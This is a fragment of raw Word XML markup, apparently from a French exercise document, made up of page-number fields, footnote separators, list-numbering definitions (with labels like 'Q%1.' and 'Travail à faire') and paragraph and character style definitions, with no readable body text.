    <w:r>
      <w:t>9</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t>/</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>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6ED84" w14:textId="77777777" w:rsidR="008D3057" w:rsidRDefault="008D30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5E6CD" w14:textId="77777777" w:rsidR="004460BF" w:rsidRDefault="004460BF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1485FAB1" w14:textId="77777777" w:rsidR="004460BF" w:rsidRDefault="004460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8F8E" w14:textId="77777777" w:rsidR="008D3057" w:rsidRDefault="008D305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36B74" w14:textId="77777777" w:rsidR="008D3057" w:rsidRDefault="008D305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5DD12" w14:textId="77777777" w:rsidR="008D3057" w:rsidRDefault="008D305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11F7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C53AB9C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49261F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9901EB4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>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080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Aria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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="159531C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2E2E13C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Q%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="491"/>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D4054C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D82508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2F785456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DA858BA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Travail à faire %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="2098" w:hanging="2098"/>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4C82AED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDDCF31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lowerRoman"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="680"/>
        </w:tabs>
        <w:ind w:left="680" w:hanging="680"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1021"/>
        </w:tabs>
        <w:ind w:left="1021" w:hanging="681"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:ind w:left="1361" w:hanging="681"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1021"/>
        </w:tabs>
        <w:ind w:left="1021" w:hanging="1021"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="36A93302"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12267DB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3A8F4980"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F662ABB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lowerRoman"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="680"/>
        </w:tabs>
        <w:ind w:left="680" w:hanging="680"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1021"/>
        </w:tabs>
        <w:ind w:left="1021" w:hanging="681"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:ind w:left="1361" w:hanging="681"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1021"/>
        </w:tabs>
        <w:ind w:left="1021" w:hanging="1021"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B7E07B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA1E4C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F557317"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="324634AC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Q%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="491"/>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8B62D70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A44EC014"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Q%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="491"/>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511E407C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="514AD76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5EBD502E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66765B44"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Q%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="491"/>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73FF4522"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFDE21F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766F5ED0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4950D59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604920573">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="860169471">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1836147976">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1009648281">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="578445513">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="310212856">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="873810539">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1414353631">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1786847589">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1282344385">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1169907840">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="844829228">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1139805974">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="2118745891">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="131229347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04F"/>
    <w:rsid w:val="0011432D"/>
    <w:rsid w:val="001A5FE3"/>
    <w:rsid w:val="004460BF"/>
    <w:rsid w:val="0066699C"/>
    <w:rsid w:val="008D3057"/>
    <w:rsid w:val="00A062D5"/>
    <w:rsid w:val="00E2504F"/>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FE3BE"/>
  <w15:docId w15:val="{DA2764C9-6C13-4258-B313-1933048B6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w:hAnsi="Times New Roman" w:cs="Arial"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>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Droid Sans Fallback" w:hAnsi="Arial" w:cs="FreeSans"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="fr-FR" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="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dnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ancredenotedefin">
    <w:name w:val="Ancre de note de fin"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteCharacters">
    <w:name w:val="Endnote Characters"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>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FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationCar">
    <w:name w:val="Citation Car"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationintenseCar">
    <w:name w:val="Citation intense Car"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CaptionChar">
    <w:name w:val="Caption Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="LienInternet">
    <w:name w:val="Lien Internet"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NotedebasdepageCar">
    <w:name w:val="Note de bas de page Car"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ancredenotedebasdepage">
    <w:name w:val="Ancre de note de bas de page"/>
    <w:qFormat/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteCharacters">
    <w:name w:val="Footnote Characters"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num1z0">
    <w:name w:val="WW8Num1z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num2z0">
    <w:name w:val="WW8Num2z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num3z0">
    <w:name w:val="WW8Num3z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z0">
    <w:name w:val="WW8Num4z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z0">
    <w:name w:val="WW8Num5z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Aria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Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num6z1">
    <w:name w:val="WW8Num6z1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num6z2">
    <w:name w:val="WW8Num6z2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z0">
    <w:name w:val="WW8Num7z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z1">
    <w:name w:val="WW8Num7z1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z3">
    <w:name w:val="WW8Num7z3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num8z0">
    <w:name w:val="WW8Num8z0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num9z0">
    <w:name w:val="WW8Num9z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>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9z4">
    <w:name w:val="WW8Num9z4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z0">
    <w:name w:val="WW8Num10z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z1">
    <w:name w:val="WW8Num10z1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="24"/>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0z4">
    <w:name w:val="WW8Num10z4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>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sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num11z5">
    <w:name w:val="WW8Num11z5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num12z0">
    <w:name w:val="WW8Num12z0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num12z1">
    <w:name w:val="WW8Num12z1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num12z3">
    <w:name w:val="WW8Num12z3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
    </w:rPr>
  </w:style>
